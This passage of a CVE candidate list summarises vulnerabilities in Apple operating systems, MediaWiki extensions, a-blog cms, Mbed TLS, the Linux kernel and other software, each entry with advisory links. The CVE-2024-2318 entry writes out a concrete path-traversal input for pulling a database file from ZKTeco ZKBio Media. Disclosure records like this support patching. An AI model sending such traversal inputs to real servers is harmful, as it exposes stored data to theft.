MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 | MISC:https://support.apple.com/en-us/HT214060 | URL:https://support.apple.com/en-us/HT214060 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 Assigned (20240112)
CVE 2024 23217 Candidate A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, iOS 17.3 and iPadOS 17.3. An app may be able to bypass certain Privacy preferences. CONFIRM:https://support.apple.com/kb/HT214085 | FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/33 | FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/36 | FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/39 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 | MISC:https://support.apple.com/en-us/HT214060 | URL:https://support.apple.com/en-us/HT214060 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 Assigned (20240112)
CVE 2024 23216 Candidate A path handling issue was addressed with improved validation. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to overwrite arbitrary files. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 Assigned (20240112)
CVE 2024 23215 Candidate An issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to access user-sensitive data. FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/33 | FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/36 | FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/39 | FULLDISC:20240126 APPLE-SA-01-22-2024-9 tvOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/40 | MISC:https://support.apple.com/en-us/HT214055 | URL:https://support.apple.com/en-us/HT214055 | MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 | MISC:https://support.apple.com/en-us/HT214060 | URL:https://support.apple.com/en-us/HT214060 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 Assigned (20240112)
CVE 2024 23214 Candidate Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, iOS 17.3 and iPadOS 17.3. Processing maliciously crafted web content may lead to arbitrary code execution. FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/33 | FULLDISC:20240126 APPLE-SA-01-22-2024-3 iOS 16.7.5 and iPadOS 16.7.5 | URL:http://seclists.org/fulldisclosure/2024/Jan/34 | FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/36 | MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 | MISC:https://support.apple.com/en-us/HT214063 | URL:https://support.apple.com/en-us/HT214063 Assigned (20240112)
CVE 2024 23213 Candidate The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. Processing web content may lead to arbitrary code execution. FEDORA:FEDORA-2024-97faaca23d | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X2VJMEDT4GL42AQVHSYOT6DIVJDZWIV4/ | FEDORA:FEDORA-2024-ca3f071aea | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/US43EQFC2IS66EA2CPAZFH2RQ6WD7PKF/ | FULLDISC:20240126 APPLE-SA-01-22-2024-1 Safari 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/27 | FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/33 | FULLDISC:20240126 APPLE-SA-01-22-2024-3 iOS 16.7.5 and iPadOS 16.7.5 | URL:http://seclists.org/fulldisclosure/2024/Jan/34 | FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/36 | FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/39 | FULLDISC:20240126 APPLE-SA-01-22-2024-9 tvOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/40 | MISC:https://support.apple.com/en-us/HT214055 | URL:https://support.apple.com/en-us/HT214055 | MISC:https://support.apple.com/en-us/HT214056 | URL:https://support.apple.com/en-us/HT214056 | MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 | MISC:https://support.apple.com/en-us/HT214060 | URL:https://support.apple.com/en-us/HT214060 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 | MISC:https://support.apple.com/en-us/HT214063 | URL:https://support.apple.com/en-us/HT214063 | MLIST:[oss-security] 20240206 WebKitGTK and WPE WebKit Security Advisory WSA-2024-0001 | URL:http://www.openwall.com/lists/oss-security/2024/02/05/8 Assigned (20240112)
CVE 2024 23212 Candidate The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, macOS Ventura 13.6.4, macOS Monterey 12.7.3. An app may be able to execute arbitrary code with kernel privileges. FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/33 | FULLDISC:20240126 APPLE-SA-01-22-2024-3 iOS 16.7.5 and iPadOS 16.7.5 | URL:http://seclists.org/fulldisclosure/2024/Jan/34 | FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/36 | FULLDISC:20240126 APPLE-SA-01-22-2024-6 macOS Ventura 13.6.4 | URL:http://seclists.org/fulldisclosure/2024/Jan/37 | FULLDISC:20240126 APPLE-SA-01-22-2024-7 macOS Monterey 12.7.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/38 | FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/39 | FULLDISC:20240126 APPLE-SA-01-22-2024-9 tvOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/40 | MISC:https://support.apple.com/en-us/HT214055 | URL:https://support.apple.com/en-us/HT214055 | MISC:https://support.apple.com/en-us/HT214057 | URL:https://support.apple.com/en-us/HT214057 | MISC:https://support.apple.com/en-us/HT214058 | URL:https://support.apple.com/en-us/HT214058 | MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 | MISC:https://support.apple.com/en-us/HT214060 | URL:https://support.apple.com/en-us/HT214060 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 | MISC:https://support.apple.com/en-us/HT214063 | URL:https://support.apple.com/en-us/HT214063 Assigned (20240112)
CVE 2024 23211 Candidate A privacy issue was addressed with improved handling of user preferences. This issue is fixed in watchOS 10.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. A user's private browsing activity may be visible in Settings. FULLDISC:20240126 APPLE-SA-01-22-2024-1 Safari 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/27 | FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/33 | FULLDISC:20240126 APPLE-SA-01-22-2024-3 iOS 16.7.5 and iPadOS 16.7.5 | URL:http://seclists.org/fulldisclosure/2024/Jan/34 | FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/36 | FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/39 | MISC:https://support.apple.com/en-us/HT214056 | URL:https://support.apple.com/en-us/HT214056 | MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 | MISC:https://support.apple.com/en-us/HT214060 | URL:https://support.apple.com/en-us/HT214060 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 | MISC:https://support.apple.com/en-us/HT214063 | URL:https://support.apple.com/en-us/HT214063 Assigned (20240112)
CVE 2024 23210 Candidate This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to view a user's phone number in system logs. FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/33 | FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/36 | FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/39 | FULLDISC:20240126 APPLE-SA-01-22-2024-9 tvOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/40 | MISC:https://support.apple.com/en-us/HT214055 | URL:https://support.apple.com/en-us/HT214055 | MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 | MISC:https://support.apple.com/en-us/HT214060 | URL:https://support.apple.com/en-us/HT214060 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 Assigned (20240112)
CVE 2024 23209 Candidate The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3. Processing web content may lead to arbitrary code execution. FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/36 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 Assigned (20240112)
CVE 2024 23208 Candidate The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to execute arbitrary code with kernel privileges. FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/33 | FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/36 | FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/39 | FULLDISC:20240126 APPLE-SA-01-22-2024-9 tvOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/40 | MISC:https://support.apple.com/en-us/HT214055 | URL:https://support.apple.com/en-us/HT214055 | MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 | MISC:https://support.apple.com/en-us/HT214060 | URL:https://support.apple.com/en-us/HT214060 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 Assigned (20240112)
CVE 2024 23207 Candidate This issue was addressed with improved redaction of sensitive information. This issue is fixed in watchOS 10.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. An app may be able to access sensitive user data. FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/33 | FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/36 | FULLDISC:20240126 APPLE-SA-01-22-2024-6 macOS Ventura 13.6.4 | URL:http://seclists.org/fulldisclosure/2024/Jan/37 | FULLDISC:20240126 APPLE-SA-01-22-2024-7 macOS Monterey 12.7.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/38 | FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/39 | MISC:https://support.apple.com/en-us/HT214057 | URL:https://support.apple.com/en-us/HT214057 | MISC:https://support.apple.com/en-us/HT214058 | URL:https://support.apple.com/en-us/HT214058 | MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 | MISC:https://support.apple.com/en-us/HT214060 | URL:https://support.apple.com/en-us/HT214060 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 Assigned (20240112)
CVE 2024 23206 Candidate An access issue was addressed with improved access restrictions. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. A maliciously crafted webpage may be able to fingerprint the user. FEDORA:FEDORA-2024-97faaca23d | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X2VJMEDT4GL42AQVHSYOT6DIVJDZWIV4/ | FEDORA:FEDORA-2024-ca3f071aea | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/US43EQFC2IS66EA2CPAZFH2RQ6WD7PKF/ | FULLDISC:20240126 APPLE-SA-01-22-2024-1 Safari 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/27 | FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/33 | FULLDISC:20240126 APPLE-SA-01-22-2024-3 iOS 16.7.5 and iPadOS 16.7.5 | URL:http://seclists.org/fulldisclosure/2024/Jan/34 | FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/36 | FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/39 | FULLDISC:20240126 APPLE-SA-01-22-2024-9 tvOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/40 | MISC:https://support.apple.com/en-us/HT214055 | URL:https://support.apple.com/en-us/HT214055 | MISC:https://support.apple.com/en-us/HT214056 | URL:https://support.apple.com/en-us/HT214056 | MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 | MISC:https://support.apple.com/en-us/HT214060 | URL:https://support.apple.com/en-us/HT214060 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 | MISC:https://support.apple.com/en-us/HT214063 | URL:https://support.apple.com/en-us/HT214063 | MLIST:[oss-security] 20240206 WebKitGTK and WPE WebKit Security Advisory WSA-2024-0001 | URL:http://www.openwall.com/lists/oss-security/2024/02/05/8 Assigned (20240112)
CVE 2024 23205 Candidate A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4. An app may be able to access sensitive user data. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
CVE 2024 23204 Candidate The issue was addressed with additional permissions checks. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, iOS 17.3 and iPadOS 17.3. A shortcut may be able to use sensitive data with certain actions without prompting the user. CONFIRM:https://support.apple.com/kb/HT214082 | CONFIRM:https://support.apple.com/kb/HT214083 | CONFIRM:https://support.apple.com/kb/HT214085 | FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/33 | FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/36 | FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/39 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 | MISC:https://support.apple.com/en-us/HT214060 | URL:https://support.apple.com/en-us/HT214060 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 Assigned (20240112)
CVE 2024 23203 Candidate The issue was addressed with additional permissions checks. This issue is fixed in macOS Sonoma 14.3, iOS 17.3 and iPadOS 17.3. A shortcut may be able to use sensitive data with certain actions without prompting the user. CONFIRM:https://support.apple.com/kb/HT214082 | CONFIRM:https://support.apple.com/kb/HT214085 | FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/33 | FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/36 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 Assigned (20240112)
CVE 2024 23201 Candidate A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Monterey 12.7.4, watchOS 10.3, tvOS 17.3, macOS Ventura 13.6.5, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3. An app may be able to cause a denial-of-service. CONFIRM:https://support.apple.com/kb/HT214055 | CONFIRM:https://support.apple.com/kb/HT214059 | CONFIRM:https://support.apple.com/kb/HT214060 | CONFIRM:https://support.apple.com/kb/HT214061 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214055 | URL:https://support.apple.com/en-us/HT214055 | MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 | MISC:https://support.apple.com/en-us/HT214060 | URL:https://support.apple.com/en-us/HT214060 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 Assigned (20240112)
CVE 2024 23196 Candidate A race condition was found in the Linux kernel's sound/hda device driver in snd_hdac_regmap_sync() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue. MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8148 | URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8148 Assigned (20240115)
CVE 2024 2319 Candidate Cross-Site Scripting (XSS) vulnerability in the Django MarkdownX project, affecting version 4.0.2. An attacker could store a specially crafted JavaScript payload in the upload functionality due to lack of proper sanitisation of JavaScript elements. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-django-markdownx | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-django-markdownx Assigned (20240308)
CVE 2024 23183 Candidate Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute an arbitrary script on the logged-in user's web browser. MISC:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html | URL:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html | MISC:https://jvn.jp/en/jp/JVN34565930/ | URL:https://jvn.jp/en/jp/JVN34565930/ Assigned (20240112)
CVE 2024 23182 Candidate Relative path traversal vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to delete arbitrary files on the server. MISC:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html | URL:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html | MISC:https://jvn.jp/en/jp/JVN34565930/ | URL:https://jvn.jp/en/jp/JVN34565930/ Assigned (20240112)
CVE 2024 23181 Candidate Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote unauthenticated attacker to execute an arbitrary script on the logged-in user's web browser. MISC:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html | URL:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html | MISC:https://jvn.jp/en/jp/JVN34565930/ | URL:https://jvn.jp/en/jp/JVN34565930/ Assigned (20240112)
CVE 2024 23180 Candidate Improper input validation vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute arbitrary code by uploading a specially crafted SVG file. MISC:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html | URL:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html | MISC:https://jvn.jp/en/jp/JVN34565930/ | URL:https://jvn.jp/en/jp/JVN34565930/ Assigned (20240112)
CVE 2024 2318 Candidate A vulnerability was found in ZKTeco ZKBio Media 2.0.0_x64_2024-01-29-1028. It has been classified as problematic. Affected is an unknown function of the file /pro/common/download of the component Service Port 9999. The manipulation of the argument fileName with the input ../../../../zkbio_media.sql leads to path traversal: '../filedir'. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256272. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256272 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256272 | MISC:VDB-256272 | ZKTeco ZKBio Media Service Port 9999 download path traversal | URL:https://vuldb.com/?id.256272 | MISC:https://gist.github.com/whiteman007/a3b25a7ddf38774329d72930e0cd841a | URL:https://gist.github.com/whiteman007/a3b25a7ddf38774329d72930e0cd841a Assigned (20240308)
CVE 2024 23179 Candidate An issue was discovered in the GlobalBlocking extension in MediaWiki before 1.40.2. For a Special:GlobalBlock?uselang=x-xss URI, i18n-based XSS can occur via the parentheses message. This affects subtitle links in buildSubtitleLinks. MISC:https://lists.wikimedia.org/hyperkitty/list/mediawiki-announce@lists.wikimedia.org/message/TDBUBCCOQJUT4SCHJNPHKQNPBUUETY52/ | MISC:https://phabricator.wikimedia.org/T347746 Assigned (20240112)
CVE 2024 23178 Candidate An issue was discovered in the Phonos extension in MediaWiki before 1.40.2. PhonosButton.js allows i18n-based XSS via the phonos-purge-needed-error message. MISC:https://lists.wikimedia.org/hyperkitty/list/mediawiki-announce@lists.wikimedia.org/message/TDBUBCCOQJUT4SCHJNPHKQNPBUUETY52/ | MISC:https://phabricator.wikimedia.org/T349312 Assigned (20240112)
CVE 2024 23177 Candidate An issue was discovered in the WatchAnalytics extension in MediaWiki before 1.40.2. XSS can occur via the Special:PageStatistics page parameter. MISC:https://lists.wikimedia.org/hyperkitty/list/mediawiki-announce@lists.wikimedia.org/message/TDBUBCCOQJUT4SCHJNPHKQNPBUUETY52/ | MISC:https://phabricator.wikimedia.org/T348979 Assigned (20240112)
CVE 2024 23174 Candidate An issue was discovered in the PageTriage extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. XSS can occur via the rev-deleted-user, pagetriage-tags-quickfilter-label, pagetriage-triage, pagetriage-filter-date-range-format-placeholder, pagetriage-filter-date-range-to, pagetriage-filter-date-range-from, pagetriage-filter-date-range-heading, pagetriage-filter-set-button, or pagetriage-filter-reset-button message. MISC:https://gerrit.wikimedia.org/r/c/mediawiki/extensions/PageTriage/+/989177 | MISC:https://phabricator.wikimedia.org/T347704 Assigned (20240112)
CVE 2024 23173 Candidate An issue was discovered in the Cargo extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. The Special:Drilldown page allows XSS via artist, album, and position parameters because of applied filter values in drilldown/CargoAppliedFilter.php. MISC:https://gerrit.wikimedia.org/r/c/mediawiki/extensions/Cargo/+/965214 | MISC:https://phabricator.wikimedia.org/T348687 Assigned (20240112)
CVE 2024 23172 Candidate An issue was discovered in the CheckUser extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. XSS can occur via message definitions. e.g., in SpecialCheckUserLog. MISC:https://gerrit.wikimedia.org/r/c/mediawiki/extensions/CheckUser/+/989179 | MISC:https://phabricator.wikimedia.org/T347708 Assigned (20240112)
CVE 2024 23171 Candidate An issue was discovered in the CampaignEvents extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. The Special:EventDetails page allows XSS via the x-xss language setting for internationalization (i18n). MISC:https://gerrit.wikimedia.org/r/q/I70d71c409193e904684dfb706d424b0a815fa6f6 | MISC:https://phabricator.wikimedia.org/T348343 Assigned (20240112)
CVE 2024 23170 Candidate An issue was discovered in Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2. There was a timing side channel in RSA private operations. This side channel could be sufficient for a local attacker to recover the plaintext. It requires the attacker to send a large number of messages for decryption, as described in "Everlasting ROBOT: the Marvin Attack" by Hubert Kario. FEDORA:FEDORA-2024-bfd98be425 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIBPEYSVRK4IFLBSYJAWKH33YBNH5HR2/ | FEDORA:FEDORA-2024-c7f1c839ac | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GP5UU7Z6LJNBLBT4SC5WWS2HDNMTFZH5/ | MISC:https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2024-01-1/ Assigned (20240112)
CVE 2024 2317 Candidate A vulnerability was found in Bdtask Hospital AutoManager up to 20240227 and classified as problematic. This issue affects some unknown processing of the file /prescription/prescription/delete/ of the component Prescription Page. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256271. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256271 | Bdtask Hospital AutoManager Prescription Page improper authorization | URL:https://vuldb.com/?id.256271 | MISC:VDB-256271 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256271 | MISC:https://drive.google.com/file/d/13-Fxw8fw3VP1PvL0fYvDBVlpTDQHyCkc/view?usp=sharing | URL:https://drive.google.com/file/d/13-Fxw8fw3VP1PvL0fYvDBVlpTDQHyCkc/view?usp=sharing Assigned (20240308)
